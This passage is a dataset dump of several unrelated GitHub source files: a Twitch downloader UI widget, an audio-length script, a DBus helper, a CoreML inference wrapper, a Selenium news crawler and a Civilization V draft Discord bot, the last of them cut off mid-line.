None:\n self._ui.refreshButton.setEnabled(False)\n if not self.scheduledDownload.isChannelRetrieved():\n self._showNetworkStatus(T(\"loading-channel-data\", ellipsis=True))\n\n def _channelDataUpdateFinished(self) -> None:\n self._ui.refreshButton.setEnabled(True)\n if not self.scheduledDownload.isChannelRetrieved():\n self._showNetworkStatus(T(\"channel-not-found\"))\n\n def _showChannel(self) -> None:\n if self.scheduledDownload.channel == None:\n target = TwitchGQLModels.Channel({\"displayName\": self.scheduledDownload.preset.channel})\n elif self.scheduledDownload.channel.stream == None:\n target = self.scheduledDownload.channel\n else:\n target = self.scheduledDownload.channel.stream\n if self._downloader == None:\n self._ui.downloadViewControlBar.showContentInfo(target)\n self._ui.downloaderView.updateContentInfo(target, immediateRefresh=False)\n elif isinstance(target, TwitchGQLModels.Stream):\n downloadInfo = self._downloader.downloadInfo.copy()\n downloadInfo.updateContent(target)\n self._ui.downloadViewControlBar.showDownloadInfo(downloadInfo)\n self._ui.downloaderView.updateContentInfo(downloadInfo, immediateRefresh=False)\n\n def _showPubSubState(self) -> None:\n if not self.scheduledDownload.isActive():\n self._showNetworkStatus(T(\"deactivated\"))\n elif self.scheduledDownload.isSubscribed():\n self._showNetworkStatus()\n elif self.scheduledDownload.isConnecting():\n self._showNetworkStatus(T(\"connecting\", ellipsis=True))\n else:\n self._showNetworkStatus(T(\"not-connected\"))\n\n def _showNetworkStatus(self, text: str | None = None) -> None:\n if text == None:\n self._ui.networkStatusArea.hide()\n else:\n self._ui.networkStatusArea.show()\n self._ui.networkStatus.setText(text)\n self.resizedSignal.emit()\n\n def openFolder(self) -> None:\n try:\n Utils.openFolder(self.scheduledDownload.preset.directory)\n except:\n Utils.info(*Messages.INFO.FOLDER_NOT_FOUND, parent=self)\n\n def openFile(self) -> None:\n try:\n Utils.openFolder(self.scheduledDownload.downloader.downloadInfo.getAbsoluteFileName())\n except:\n Utils.info(*Messages.INFO.FOLDER_NOT_FOUND, parent=self)\n\n def editScheduledDownload(self) -> None:\n scheduledDownloadSettings = Ui.ScheduledDownloadSettings(self.scheduledDownload.preset, parent=self)\n scheduledDownloadSettings.scheduledDownloadUpdated.connect(self.scheduledDownload.updateChannelData, QtCore.Qt.ConnectionType.QueuedConnection)\n scheduledDownloadSettings.exec()\n\n def tryRemoveScheduledDownload(self) -> None:\n if self.scheduledDownload.isActive():\n if self.scheduledDownload.status.isDownloading():\n if not Utils.ask(*Messages.ASK.STOP_DOWNLOAD, parent=self):\n return\n self.scheduledDownload.setEnabled(False)\n self._widgetRemoveController.registerRemove()\n self.setEnabled(False)\n\n def removeScheduledDownload(self) -> None:\n App.ScheduledDownloadManager.remove(self.scheduledDownloadId)", "repo_name": "devhotteok/TwitchLink", "sub_path": "Ui/ScheduledDownloadPreview.py", "file_name": "ScheduledDownloadPreview.py", "file_ext": "py", "file_size_in_byte": 10137, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 287, "dataset": "github-code", "pt": "53", "api": [{"api_name": "uuid.UUID", "line_number": 14, "usage_type": "attribute"}, {"api_name": "Download.Downloader.Core.StreamDownloader.StreamDownloader", "line_number": 17, "usage_type": "name"}, {"api_name": "Ui.Components.Widgets.WidgetRemoveController.WidgetRemoveController", "line_number": 18, "usage_type": "call"}, {"api_name": "Ui.Components.Widgets.WidgetRemoveController.DownloadViewControlBar", "line_number": 21, "usage_type": "call"}, {"api_name": "Ui.Components.Widgets.WidgetRemoveController", "line_number": 21, "usage_type": "name"}, {"api_name": "Ui.Components.Widgets.WidgetRemoveController.DownloaderView", "line_number": 22, "usage_type": "call"}, {"api_name": "Ui.Components.Widgets.WidgetRemoveController", "line_number": 22, "usage_type": "name"}, {"api_name": "Services.Messages.Messages.ASK", "line_number": 60, "usage_type": "attribute"}, {"api_name": "Services.Messages.Messages", "line_number": 60, "usage_type": "name"}, {"api_name": "Download.ScheduledDownloadPreset.Exceptions", "line_number": 75, "usage_type": "attribute"}, {"api_name": "Download.ScheduledDownloadPreset", "line_number": 75, "usage_type": "name"}, {"api_name": "Download.Downloader.Core.StreamDownloader.StreamDownloader", "line_number": 85, "usage_type": "name"}, {"api_name": "Services.Twitch.GQL.TwitchGQLModels.Channel", "line_number": 129, "usage_type": "call"}, {"api_name": "Services.Twitch.GQL.TwitchGQLModels", "line_number": 129, "usage_type": "name"}, {"api_name": "Services.Twitch.GQL.TwitchGQLModels.Stream", "line_number": 137, "usage_type": "attribute"}, {"api_name": "Services.Twitch.GQL.TwitchGQLModels", "line_number": 137, "usage_type": "name"}, {"api_name": "Services.Messages.Messages.INFO", "line_number": 165, "usage_type": "attribute"}, {"api_name": "Services.Messages.Messages", "line_number": 165, "usage_type": "name"}, {"api_name": "Services.Messages.Messages.INFO", "line_number": 171, "usage_type": "attribute"}, {"api_name": "Services.Messages.Messages", "line_number": 171, "usage_type": "name"}, {"api_name": "Ui.Components.Widgets.WidgetRemoveController.ScheduledDownloadSettings", "line_number": 174, "usage_type": "call"}, {"api_name": "Ui.Components.Widgets.WidgetRemoveController", "line_number": 174, "usage_type": "name"}, {"api_name": "Services.Messages.Messages.ASK", "line_number": 181, "usage_type": "attribute"}, {"api_name": "Services.Messages.Messages", "line_number": 181, "usage_type": "name"}]}
+{"seq_id": "9666691237", "text": "import os\nimport librosa\n\n# Đường dẫn đến thư mục chứa các file âm thanh\naudio_folder = '/root/Datasets/CREMA-D/Features/audios'\n\n# Khởi tạo biến để lưu thông tin về file âm thanh ngắn nhất\nshortest_duration = float('inf') # Đặt giá trị ban đầu là vô cùng lớn\nshortest_audio_file = None\n\n# Duyệt qua các file trong thư mục\nfor filename in os.listdir(audio_folder):\n if filename.endswith('.wav'): # Chỉ xử lý các file có định dạng .wav (hoặc tùy chọn định dạng khác)\n file_path = os.path.join(audio_folder, filename)\n \n # Lấy độ dài của file âm thanh\n audio, sr = librosa.load(file_path)\n audio_duration = len(audio) / sr\n \n # Kiểm tra nếu độ dài nhỏ hơn độ dài ngắn nhất hiện tại\n if audio_duration < shortest_duration:\n shortest_duration = audio_duration\n shortest_audio_file = filename\n\n# In ra thông tin về file âm thanh ngắn nhất\nprint('Shortest audio file:', shortest_audio_file)\nprint('Duration:', shortest_duration, 'seconds')\n", "repo_name": "cxnam-vnuhcmus/AFIF", "sub_path": "Audio_Preprocessing.py", "file_name": "Audio_Preprocessing.py", "file_ext": "py", "file_size_in_byte": 1134, "program_lang": "python", "lang": "vi", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.listdir", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "librosa.load", "line_number": 17, "usage_type": "call"}]}
+{"seq_id": "36725419999", "text": "import os\nimport weakref\nimport decorator\nimport inspect\nimport dbus.service\nimport threading\nfrom gi.repository import GLib\nfrom becv_utils import print_except, printb, printr, printg\n\nclass BEC5DBusObj(dbus.service.Object):\n obj_path = '/org/yyc_arch/becv'\n def __init__(self, mgr):\n self.__mgr = weakref.ref(mgr)\n dbus.service.Object.__init__(self, mgr.conn, self.obj_path)\n @property\n def becv_manager(self):\n return self.__mgr()\n @classmethod\n def method(cls, *a, error_ret=False, threaded=False, **kw):\n if threaded:\n dbus_deco = dbus.service.method(*a, async_callbacks=('_reply_hdl',\n '_error_hdl'),\n **kw)\n else:\n dbus_deco = dbus.service.method(*a, **kw)\n def _deco(func):\n if threaded:\n def _func(self, *_args, _reply_hdl=None, _error_hdl=None):\n def __worker():\n try:\n res = func(self, *_args)\n except:\n print_except()\n res = error_ret\n ctx = GLib.main_context_default()\n ctx.invoke_full(0, _reply_hdl, res)\n thread = threading.Thread(target=__worker, daemon=True)\n thread.start()\n func_fmt = ('%s(%s, _reply_hdl=None, _error_hdl=None)')\n func_fmt2 = ('_func(%s, _reply_hdl=_reply_hdl, '\n '_error_hdl=_error_hdl)')\n else:\n def _func(self, *_args):\n try:\n return func(self, *_args)\n except:\n print_except()\n return error_ret\n func_fmt = '%s(%s)'\n func_fmt2 = '_func(%s)'\n eval_dict = {'_func': _func}\n args_sig = ', '.join(inspect.getfullargspec(func)[0])\n name = func.__name__\n _func = decorator.FunctionMaker.create(\n func_fmt % (name, args_sig),\n 'return ' + func_fmt2 % args_sig, eval_dict)\n return dbus_deco(_func)\n return _deco\n\nclass BEC5DBusFmtObj(BEC5DBusObj):\n obj_path_fmt = '/org/yyc_arch/becv/%d'\n def __init__(self, mgr, *args):\n self.obj_path = self.obj_path_fmt % args\n BEC5DBusObj.__init__(self, mgr)\n", "repo_name": "bec5-group/bec5-web", "sub_path": "becv_dbus/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 2506, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "dbus.service.service", "line_number": 10, "usage_type": "attribute"}, {"api_name": "dbus.service", "line_number": 10, "usage_type": "name"}, {"api_name": "weakref.ref", "line_number": 13, "usage_type": "call"}, {"api_name": "dbus.service.service.Object.__init__", "line_number": 14, "usage_type": "call"}, {"api_name": "dbus.service.service", "line_number": 14, "usage_type": "attribute"}, {"api_name": "dbus.service", "line_number": 14, "usage_type": "name"}, {"api_name": "dbus.service.service.method", "line_number": 21, "usage_type": "call"}, {"api_name": "dbus.service.service", "line_number": 21, "usage_type": "attribute"}, {"api_name": "dbus.service", "line_number": 21, "usage_type": "name"}, {"api_name": "dbus.service.service.method", "line_number": 25, "usage_type": "call"}, {"api_name": "dbus.service.service", "line_number": 25, "usage_type": "attribute"}, {"api_name": "dbus.service", "line_number": 25, "usage_type": "name"}, {"api_name": "becv_utils.print_except", "line_number": 33, "usage_type": "call"}, {"api_name": "gi.repository.GLib.main_context_default", "line_number": 35, "usage_type": "call"}, {"api_name": "gi.repository.GLib", "line_number": 35, "usage_type": "name"}, {"api_name": "threading.Thread", "line_number": 37, "usage_type": "call"}, {"api_name": "becv_utils.print_except", "line_number": 47, "usage_type": "call"}, {"api_name": "inspect.getfullargspec", "line_number": 52, "usage_type": "call"}, {"api_name": "decorator.FunctionMaker.create", "line_number": 54, "usage_type": "call"}, {"api_name": "decorator.FunctionMaker", "line_number": 54, "usage_type": "attribute"}]}
+{"seq_id": "13920105721", "text": "from typing import Dict\n\nimport coremltools as ct\nimport numpy as np\nimport torch\n\nfrom mmdeploy.utils import Backend\nfrom mmdeploy.utils.timer import TimeCounter\nfrom ..base import BACKEND_WRAPPER, BaseWrapper\n\n\n@BACKEND_WRAPPER.register_module(Backend.COREML.value)\nclass CoreMLWrapper(BaseWrapper):\n \"\"\"CoreML wrapper class for inference.\n\n Args:\n model_file (str): Path of a mlpackage file.\n bin_file (str): Path of a binary file.\n\n Examples:\n >>> from mmdeploy.backend.coreml import CoreMLWrapper\n >>> import torch\n >>>\n >>> model_file = 'model.mlpackage'\n >>> model = CoreMLWrapper(model_file)\n >>> inputs = dict(input=torch.randn(1, 3, 224, 224))\n >>> outputs = model(inputs)\n >>> print(outputs)\n \"\"\"\n\n def __init__(self, model_file: str):\n self.model = ct.models.model.MLModel(\n model_file, compute_units=ct.ComputeUnit.ALL)\n spec = self.model.get_spec()\n output_names = [out.name for out in spec.description.output]\n super().__init__(output_names)\n\n def forward(self, inputs: Dict[str,\n torch.Tensor]) -> Dict[str, torch.Tensor]:\n \"\"\"Run forward inference.\n\n Args:\n inputs (Dict[str, torch.Tensor]): Key-value pairs of model inputs.\n\n Returns:\n Dict[str, torch.Tensor]: Key-value pairs of model outputs.\n \"\"\"\n model_inputs = dict(\n (k, v.detach().cpu().numpy()) for k, v in inputs.items())\n output = self.__execute(model_inputs)\n for name, tensor in output.items():\n output[name] = torch.from_numpy(tensor)\n return output\n\n @TimeCounter.count_time(Backend.COREML.value)\n def __execute(self, inputs: Dict[str, np.ndarray]) -> Dict:\n \"\"\"Run inference with CoreML.\n\n Args:\n inputs (Dict[str, np.ndarray]): Input data with keys.\n\n Returns:\n Dict[str, np.ndarray]: Inference results with keys.\n \"\"\"\n return self.model.predict(inputs)\n", "repo_name": "open-mmlab/mmdeploy", "sub_path": "mmdeploy/backend/coreml/wrapper.py", "file_name": "wrapper.py", "file_ext": "py", "file_size_in_byte": 2062, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2256, "dataset": "github-code", "pt": "53", "api": [{"api_name": "base.BaseWrapper", "line_number": 13, "usage_type": "name"}, {"api_name": "coremltools.models.model.MLModel", "line_number": 32, "usage_type": "call"}, {"api_name": "coremltools.models", "line_number": 32, "usage_type": "attribute"}, {"api_name": "coremltools.ComputeUnit", "line_number": 33, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 38, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 39, "usage_type": "attribute"}, {"api_name": "torch.from_numpy", "line_number": 52, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 39, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 56, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 56, "usage_type": "attribute"}, {"api_name": "mmdeploy.utils.timer.TimeCounter.count_time", "line_number": 55, "usage_type": "call"}, {"api_name": "mmdeploy.utils.timer.TimeCounter", "line_number": 55, "usage_type": "name"}, {"api_name": "mmdeploy.utils.Backend.COREML", "line_number": 55, "usage_type": "attribute"}, {"api_name": "mmdeploy.utils.Backend", "line_number": 55, "usage_type": "name"}, {"api_name": "base.BACKEND_WRAPPER.register_module", "line_number": 12, "usage_type": "call"}, {"api_name": "base.BACKEND_WRAPPER", "line_number": 12, "usage_type": "name"}, {"api_name": "mmdeploy.utils.Backend.COREML", "line_number": 12, "usage_type": "attribute"}, {"api_name": "mmdeploy.utils.Backend", "line_number": 12, "usage_type": "name"}]}
+{"seq_id": "43583860094", "text": "# -*- coding: utf-8 -*-\n\nimport time, datetime, re, hashlib, os, sys\nfrom time import sleep\nfrom selenium.common.exceptions import NoSuchElementException, NoSuchAttributeException, TimeoutException\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\n# import crawlerfun\n\nclass Cyol:\n def __init__(self, d):\n timeStamp = time.time()\n timeArray = time.localtime(timeStamp)\n self.date = time.strftime('%Y-%m-%d %H:%M:%S', timeArray)\n self.projectName = 'food'\n self.d = d\n self.dir = self._dir = self.source = ''\n self.debug = True\n\n\n def crawl(self):\n print('\\n', '-' * 10, 'http://cyol.com/', '-' * 10, '\\n')\n self.i = self.total = 0\n self.browser = webdriver.Firefox()\n self.browser.set_window_position(x = 630, y = 0)\n n = 0\n\n webLst = [\n 'http://qnck.cyol.com/',\n 'http://zqb.cyol.com/',\n 'http://qnzj.cyol.com/',\n 'http://qnsx.cyol.com/']\n\n for url in webLst:\n self.i = 0\n try:\n self.browser.get(url)\n sleep(5)\n except TimeoutException:\n return\n\n\n pageList = self.browser.find_elements(by = By.CSS_SELECTOR, value = 'div#pageList > ul > li')\n print(len(pageList))\n for i in range(len(pageList)):\n item = self.browser.find_elements(by = By.CSS_SELECTOR, value = 'div#pageList > ul > li')[i]\n listName = item.find_element(by = By.TAG_NAME, value = 'a').text\n\n itemList = self.browser.find_elements(by = By.CSS_SELECTOR, value = '#titleList > ul > li')\n for j in range(len(itemList) - 1):\n if self.i == 0:\n self.browser.find_element(by = By.CSS_SELECTOR, value = '#titleList > ul > li:nth-child(1)').click()\n\n self.extract()\n try:\n self.browser.find_element(by = By.PARTIAL_LINK_TEXT, value = '下一篇').click()\n except NoSuchElementExccomnewseption:\n print('click return')\n self.i = 0\n self.browser.find_element(by = By.PARTIAL_LINK_TEXT, value = '返回目录').click()\n\n continue\n if '01版' in listName:\n if self.i == 0:\n self.browser.find_element(by = By.CSS_SELECTOR, value = '#titleList > ul > li:nth-child(1)').click()\n\n self.extract()\n try:\n self.browser.find_element(by = By.PARTIAL_LINK_TEXT, value = '下一篇').click()\n except NoSuchElementException:\n self.i = 0\n self.browser.find_element(by = By.PARTIAL_LINK_TEXT, value = '返回目录').click()\n else:\n item.find_element(by = By.TAG_NAME, value = 'a').click()\n if self.i == 0:\n self.browser.find_element(by = By.CSS_SELECTOR, value = '#titleList > ul > li:nth-child(1)').click()\n\n self.extract()\n try:\n self.browser.find_element(by = By.PARTIAL_LINK_TEXT, value = '下一篇').click()\n except NoSuchElementException:\n self.i = 0\n self.browser.find_element(by = By.PARTIAL_LINK_TEXT, value = '返回目录').click()\n\n\n\n if self.total > 0:\n # self.rename()\n # self.expire()\n\n return self.total\n else:\n return 0\n\n\n # 提取信息,一条的\n def extract(self):\n try:\n link = self.browser.current_url\n md5 = self.makeMD5(link)\n\n # dict filter\n if md5 in self.d:\n return\n else:\n self.d[md5] = self.date.split(' ')[0] # 往dict里插入记录\n self.i += 1\n self.total += 1\n\n title = self.browser.find_element(By.CSS_SELECTOR, value = 'div.list_t > div > h1').text\n\n self.source = self.getPageText()\n\n print(link, title)\n sleep(1)\n # self.write_new_file(link, title, self.source, self.i, self.date, 855436)\n except (NoSuchElementException, NoSuchAttributeException) as e:\n print('Element error:', e)\n except Exception:\n return\n\n\n def getPageText(self, ): # 获取网页正文\n try:\n html = self.browser.find_element(By.CSS_SELECTOR, value = 'div#ozoom').get_attribute('innerHTML')\n except NoSuchElementException:\n html = self.browser.page_source\n\n return html\n\n\n # 生成md5信息\n def makeMD5(self, link):\n m = hashlib.md5()\n b = link.encode(encoding = 'utf-8')\n m.update(b)\n enc = m.hexdigest()\n\n return enc\n\n\nif __name__ == '__main__':\n chanye = Cyol({})\n chanye.crawl()\n", "repo_name": "tonyhauuk/Non-project", "sub_path": "crawl/hangye_web/cyol/cyol.py", "file_name": "cyol.py", "file_ext": "py", "file_size_in_byte": 5236, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "time.time", "line_number": 15, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 16, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 17, "usage_type": "call"}, {"api_name": "selenium.webdriver.Firefox", "line_number": 27, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 27, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 41, "usage_type": "call"}, {"api_name": "selenium.common.exceptions.TimeoutException", "line_number": 42, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 46, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 46, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 49, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 49, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.TAG_NAME", "line_number": 50, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 50, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 52, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 52, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 55, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 55, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.PARTIAL_LINK_TEXT", "line_number": 59, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 59, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.PARTIAL_LINK_TEXT", "line_number": 63, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 63, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 68, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 68, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.PARTIAL_LINK_TEXT", "line_number": 72, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 72, "usage_type": "name"}, {"api_name": "selenium.common.exceptions.NoSuchElementException", "line_number": 73, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.PARTIAL_LINK_TEXT", "line_number": 75, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 75, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.TAG_NAME", "line_number": 77, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 77, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 79, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 79, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.PARTIAL_LINK_TEXT", "line_number": 83, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 83, "usage_type": "name"}, {"api_name": "selenium.common.exceptions.NoSuchElementException", "line_number": 84, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.PARTIAL_LINK_TEXT", "line_number": 86, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 86, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 113, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 113, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 118, "usage_type": "call"}, {"api_name": "selenium.common.exceptions.NoSuchElementException", "line_number": 120, "usage_type": "name"}, {"api_name": "selenium.common.exceptions.NoSuchAttributeException", "line_number": 120, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 128, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 128, "usage_type": "name"}, {"api_name": "selenium.common.exceptions.NoSuchElementException", "line_number": 129, "usage_type": "name"}, {"api_name": "hashlib.md5", "line_number": 137, "usage_type": "call"}]}
+{"seq_id": "69793698087", "text": "\"\"\"\n# Civilization V - Drafter\n# Description: A simple Discord Bot for Civilization V Multiplayer Drafts.\n# Author: Mehmet YILDIZ\n# Version/Date: 220727\n# License: MIT License.\n\"\"\"\n\n#region IMPORTS\n####### ####### #######\n# System Imports\nimport os\nfrom dotenv import load_dotenv\n# Discord Imports\nimport discord\nfrom discord.commands import option\n# In-House Imports\nimport gamedata\nfrom gamelobby import GameLobby\n# Other\nimport random\n#endregion\n\n#region INITIALIZATION\n####### ####### #######\n\n# Initialize Environment Values\nload_dotenv()\nTOKEN = os.getenv(\"DISCORD_TOKEN\")\nGID = os.getenv(\"DISCORD_GID\")\n\n# Initialize Intents, for easier expansion.ß\nintents = discord.Intents.default()\nintents.members = True \nintents.message_content = True\n\n# Initialize the Bot\nbot = discord.Bot(debug_guilds=[GID], intents=intents)\n\n# Log into Discord and Report Status\n@bot.event\nasync def on_ready():\n print(f\"Logged in as {bot.user} (ID: {bot.user.id})\")\n print(\"------\")\n\n# Create Active Lobby for the Game\nlobbies = {}\n\ndef get_lobby(gid: int):\n \"\"\"\n Returns the active lobby for the given the Guild ID.\n\n :param gid: Guild ID\n :returns: Active GameLobby\n \"\"\"\n\n if gid in lobbies.keys():\n return lobbies.get(gid)\n else:\n # Else create a placeholder lobby for the requested Guild.\n # Effectively the same as using /ng command.\n lobbies.update({gid : GameLobby(gid, 4, 2, 3)})\n return lobbies.get(gid) \n#endregion\n\n#region AUTO-COMPLETE METHODS\n####### ####### #######\n# Methods that autocomplete user input in DC.\n\n# Searchers (that list all items in a given list)\nasync def ac_civ_searcher(ctx: discord.AutocompleteContext, \ndescription=\"Returns a list of matching civilizations from CIVILIZATIONS.\"):\n return [civ for civ in gamedata.CIVILIZATIONS]\n\nasync def ac_tier_searcher(ctx: discord.AutocompleteContext,\ndescription=\"Returns a list of matching tiers from TIERS.\"):\n return [tier for tier in gamedata.TIERS]\n\nasync def ac_pool_searcher(ctx: discord.AutocompleteContext,\ndescription=\"Returns a list of matching civilizations from the lobby pool.\"):\n return [civ for civ in get_lobby(ctx.interaction.guild.id).poolcivs()]\n\n# Filters (that filters items in a given list according to user input)\nasync def ac_civilizations(ctx: discord.AutocompleteContext):\n \"\"\"Returns a list of civilizations that begin with the characters entered so far.\"\"\"\n return [civ for civ in gamedata.CIVILIZATIONS if civ.startswith(ctx.value.capitalize())]\n\nasync def ac_pool(ctx: discord.AutocompleteContext):\n \"\"\"Returns a list of civilizations that begin with the characters entered so far from the lobby pool.\"\"\"\n return [civ for civ in (['Random'] + get_lobby(ctx.interaction.guild.id).poolcivs()) if civ.startswith(ctx.value.capitalize())]\n#endregion\n\n#region LOBBY COMMANDS\n####### ####### #######\n# Bot commands for lobby management.\n\nlobby = bot.create_group(name=\"lobby\", description=\"Commands related to the lobby creation.\")\n\n# LOBBY CREATION\n@lobby.command(name=\"ng\", description=\"Create a New GameLobby for Civilization V with optional ban/pick settings.\")\n@option(\"playercount\", description=\"How many players?\", min_value=1, max_value=8, type=int, required=True)\n@option(\"bancount\", description=\"How many bans per player?\", min_value=1, max_value=2, default=1, type=int, required=False)\n@option(\"pickcount\", description=\"How many picks per player?\", min_value=1, max_value=5, default=3, type=int, required=False)\nasync def ng(ctx: discord.ApplicationContext, playercount: int, bancount: int, pickcount: int):\n global lobbies\n lobbies.update({ctx.guild.id : GameLobby(ctx.guild.id, playercount, bancount, pickcount)})\n await ctx.respond(f\"Initializing a new lobby...\\n\"+\n \"###### NEW GAME ######\\n\"\n f\"Created a new lobby for {get_lobby(ctx.guild.id).get_player_count()} players!\\n\"+\n f\"Each player can ban {get_lobby(ctx.guild.id).get_ban_count()} and pick {get_lobby(ctx.guild.id).get_pick_count()} civilizations.\\n\"+\n get_lobby(ctx.guild.id).ban_default())\n\n@lobby.command(name=\"info\", description=\"Print the GameLobby settings for players, bans, and picks.\")\nasync def info(ctx: discord.ApplicationContext):\n await ctx.respond(f\"Lobby Information: {get_lobby(ctx.guild.id).get_player_count()} Players, \" +\n f\"{get_lobby(ctx.guild.id).get_ban_count()} Bans, {get_lobby(ctx.guild.id).get_pick_count()} Picks.\")\n\n# PLAYER REGISTRATION\n@lobby.command(name=\"register\", description=\"Register for the active lobby.\")\nasync def register(ctx: discord.ApplicationContext):\n await ctx.respond(get_lobby(ctx.guild.id).register_player(ctx.author.mention)[1])\n\n@lobby.command(name=\"unregister\", description=\"Unregister from the active lobby.\")\nasync def unregister(ctx: discord.ApplicationContext):\n await ctx.respond(get_lobby(ctx.guild.id).unregister_player(ctx.author.mention))\n\n@lobby.command(name=\"lp\", description=\"Print the list of registered players within the active lobby.\")\nasync def list_players(ctx: discord.ApplicationContext):\n await ctx.respond(get_lobby(ctx.guild.id).get_players())\n\n# BANS\n@lobby.command(name=\"ban\", description=\"Ban a Civilization.\")\n@option(\"civ_one\", description=\"First civilization to ban.\", type=str, required=True, autocomplete=ac_pool)\n@option(\"civ_two\", description=\"Second civilization to ban.\", type=str, required=False, autocomplete=ac_pool)\nasync def ban(ctx: discord.ApplicationContext, civ_one: str, civ_two: str):\n # Format the input.\n civ_one = civ_one.capitalize()\n if (civ_two):\n civ_two = civ_two.capitalize()\n # Assign Random Civilizations if the user picked random.\n if civ_one == \"Random\":\n civ_one = get_lobby(ctx.guild.id).random_civ()\n if civ_two == \"Random\":\n civ_two = get_lobby(ctx.guild.id).random_civ()\n\n # Continue with the ban.\n if (not civ_two):\n await ctx.respond(f\"UPDATE:\\n{get_lobby(ctx.guild.id).ban_civ(ctx.author.mention, civ_one)}\")\n else:\n await ctx.respond(f\"UPDATE:\\n{get_lobby(ctx.guild.id).ban_civ(ctx.author.mention, civ_one)}\\n\"+\n f\"{get_lobby(ctx.guild.id).ban_civ(ctx.author.mention, civ_two)}\")\n\n@lobby.command(name=\"unban\", description=\"Unban a civilization that you banned.\")\n@option(\"civ_one\", description=\"First civilization to ban.\", type=str, required=True, autocomplete=ac_civilizations)\n@option(\"civ_two\", description=\"Second civilization to ban.\", type=str, required=False, autocomplete=ac_civilizations)\nasync def unban(ctx: discord.ApplicationContext, civ_one: str, civ_two: str):\n if (not civ_two):\n await ctx.respond(f\"UPDATE:\\n{get_lobby(ctx.guild.id).unban_civ(ctx.author.mention, civ_one)}\")\n else:\n await ctx.respond(f\"UPDATE:\\n{get_lobby(ctx.guild.id).unban_civ(ctx.author.mention, civ_one)}\\n\"+\n f\"{get_lobby(ctx.guild.id).ban_civ(ctx.author.mention, civ_two)}\")\n\n@lobby.command(name=\"lc\", description=\"Print the list of civilizations in the pool.\")\nasync def pool(ctx: discord.ApplicationContext):\n result = \"AVAILABLE POOL\"\n for tier in get_lobby(ctx.guild.id).get_pool().keys():\n result += f\"\\nTier {tier}: {', '.join(get_lobby(ctx.guild.id).get_pool()[tier])}\"\n await ctx.respond(result)\n\n@lobby.command(name=\"lb\", description=\"Print the list of existing bans within the game lobby.\")\nasync def list_bans(ctx: discord.ApplicationContext):\n await ctx.respond(get_lobby(ctx.guild.id).get_bans())\n\n# PICKS\n@lobby.command(name=\"draft\", description=\"Create a new Draft from the available pool.\")\nasync def draft(ctx: discord.ApplicationContext):\n get_lobby(ctx.guild.id).draft()\n await ctx.respond(get_lobby(ctx.guild.id).get_picks())\n\n@lobby.command(name=\"rd\", description=\"Create a new Draft from the available pool.\")\nasync def re_draft(ctx: discord.ApplicationContext):\n get_lobby(ctx.guild.id).redraft()\n await ctx.respond(get_lobby(ctx.guild.id).get_picks())\n\n@lobby.command(name=\"ld\", description=\"Print the list of available picks for each player.\")\nasync def list_picks(ctx: discord.ApplicationContext):\n await 